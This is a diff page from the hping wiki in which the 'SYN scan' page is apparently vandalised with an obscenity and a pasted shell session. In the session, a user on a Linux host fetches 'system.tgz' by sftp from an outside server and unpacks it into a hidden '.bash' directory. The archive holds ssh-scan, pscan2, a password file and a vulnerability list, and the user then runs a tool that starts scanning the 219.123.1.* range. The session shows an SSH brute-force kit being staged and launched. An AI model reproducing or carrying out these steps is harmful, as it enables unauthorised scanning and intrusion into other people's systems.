hping wiki

Differences for page SYN scan

Current version compared with version Thu Aug 11 23:45:40 GMT 2005

- more pusite kurac+ `from the [nmap] manual page`:
+ TCP SYN scan: A linux hack demonstration  :)))
+ login as: receptie
+ Password:
+ Linux recreatie 2.6.12-1-686 #1 Tue Sep 27 12:52:50 JST 2005 i686 GNU/Linux
+ receptie@recreatie:~$ w
+  20:45:17 up 70 days,  6:18,  1 user,  load average: 0.00, 0.00, 0.00
+ USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
+ receptie pts/1    ac970556.ipt.aol 20:44    0.00s  0.03s  0.00s w
+ receptie@recreatie:~$ uname -a
+ Linux recreatie 2.6.12-1-686 #1 Tue Sep 27 12:52:50 JST 2005 i686 GNU/Linux
+ receptie@recreatie:~$ cd /var/tmp
+ receptie@recreatie:/var/tmp$ ls
+ filelist.txt.gz  vi.recover
+ receptie@recreatie:/var/tmp$ sftp weedzone@weedzone.netfirms.com
+ Connecting to weedzone.netfirms.com...
+ weedzone@weedzone.netfirms.com's password:
+ sftp> cd www
+ sftp> ls
+ Fetching /mnt/b0263360/www/scanere/system.tgz to system.tgz
+ /mnt/b0263360/www/scanere/system.tgz            3%   96KB  10.7KB/s   04:48 ETA
+ sftp> bye
+ receptie@recreatie:/var/tmp$ tar xvf system.tgz
+ .bash/
+ .bash/gen-pass.sh
+ .bash/vuln.txt
+ .bash/paas
+ .bash/pscan2
+ .bash/lolz
+ .bash/a
+ .bash/x
+ .bash/pass_file
+ .bash/core
+ .bash/ss
+ .bash/common
+ .bash/ssh-scan
+ .bash/218.1.pscan.22
+ receptie@recreatie:/var/tmp$ cd .bash
+ receptie@recreatie:/var/tmp/.bash$ ls
+ 218.1.pscan.22  common  gen-pass.sh  paas       pscan2  ssh-scan  x
+ a               core    lolz         pass_file  ss      vuln.txt
+ receptie@recreatie:/var/tmp/.bash$ ./a 219 122
+ ### omega test driver designed By dork&dork.ltd ##
+ ### Our Thanks TO : dork & dork & cornel         ###
+ ### let the games begin
+ # scanning: 219.123.1.* (total: 0) (0.4% done)

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